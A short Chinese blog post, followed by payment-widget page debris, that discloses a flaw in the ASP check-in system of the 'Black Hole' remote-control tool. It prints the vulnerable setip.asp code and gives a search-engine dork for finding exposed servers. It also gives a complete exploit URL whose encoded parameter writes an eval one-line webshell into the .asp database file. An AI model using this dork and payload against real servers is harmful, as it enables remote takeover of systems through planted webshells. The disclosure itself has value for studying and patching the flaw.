黑洞的ASP上线系统的一个漏洞

本文分析了一种存在于ASP上线系统中的安全漏洞,攻击者可通过特定请求获取目标服务器的webshell。漏洞利用过程中,攻击者可以修改数据库中的IP信息,进而实现远程控制。文章详细展示了如何构造恶意请求以及执行eval命令的过程。
作者: toby57
在默认的情况下,利用该漏洞可得到上线系统所在服务器的webshell
ASP上线系统中保存上线IP信息的数据库的扩展名默认为asp
写入配置时对参数未作检查,setip.asp相关代码
<%
strIP=Trim(Request.QueryString("Ip"))
strPort=Trim(Request.QueryString("Port"))
strType=Trim(Request.QueryString("Type"))
if strType="0" then
strIP=Request.ServerVariables("REMOTE_HOST")
end if
sql="select * from Info where strMark='Main'"
rs.Open sql,conn,1,3
if not rs.eof or not rs.bof then
rs("strIPAddress")=strIP
rs("strPort")=strPort
rs("strType")=strType
rs.update
'不要修改下面的反馈字符.否则程序不知道是否更新成功.
response.write "update success!"
else
response.write "update fail!"
end if
set rs=nothing
conn.close
set conn=nothing
以“inurl:setip.asp”为关键字找了一个测试地址http://xxx.com/blackhole/setip.asp
提交
http://xxx.com/blackhole/setip.asp?Type=%A9%E0%B0Y%CE%DB%A0%84%9F%A8%94%B3%AC%9B%A1%C5%A1%D4%A9%CD%90%F7
这样就插入了EVAL一句话
ipdat.asp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值